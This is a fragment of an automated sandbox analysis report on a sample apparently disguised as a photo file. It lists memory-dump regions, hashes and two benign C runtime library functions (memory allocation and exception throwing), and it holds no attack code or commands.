                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalH_prolog3InitializeSection_malloc
                                                                • String ID: "c$("c
                                                                • API String ID: 2485071247-2887784113
                                                                • Opcode ID: c1e2800050ad6374954d4820057c9ce28d84382b21dec8e80beb934da1cbb75e
                                                                • Instruction ID: 7884e01bd7d73e5a076d7ad8397b28ffa8c66729f5bf3f18dd50787a30cc06db
                                                                • Opcode Fuzzy Hash: c1e2800050ad6374954d4820057c9ce28d84382b21dec8e80beb934da1cbb75e
                                                                • Instruction Fuzzy Hash: 11F0ECF05103428AD7417F65AC1533F3DE57B1232AF50056EE5105F1D2C7BE870487A9
                                                                Function 004265A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • std::exception::exception.LIBCMT ref: 004265BD
                                                                  • Part of subcall function 0048A1C4: std::exception::_Copy_str.LIBCMT ref: 0048A1DF
                                                                • __CxxThrowException@8.LIBCMT ref: 004265D2
                                                                  • Part of subcall function 0049303F: RaiseException.KERNEL32(?,?,0048A3F7,?,?,?,?,?,0048A3F7,?,006111F0,0062EE40), ref: 00493081
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                • String ID: =1A
                                                                • API String ID: 2299493649-343202149
                                                                • Opcode ID: e85704d11d49ba5dd8953749a40f7d73c773b46eae0cb6c3855d0cc50b4e1c35
                                                                • Instruction ID: 2b37f0e62a85d494fb1bd0a40b7d4c44b5ae79c4c6b5e04647dec7f7686f407c
                                                                • Opcode Fuzzy Hash: e85704d11d49ba5dd8953749a40f7d73c773b46eae0cb6c3855d0cc50b4e1c35
                                                                • Instruction Fuzzy Hash: B3E08C7190021FAADB00FBA58C029EFB2BCAF00348F40042BA211A10C2EBB496089666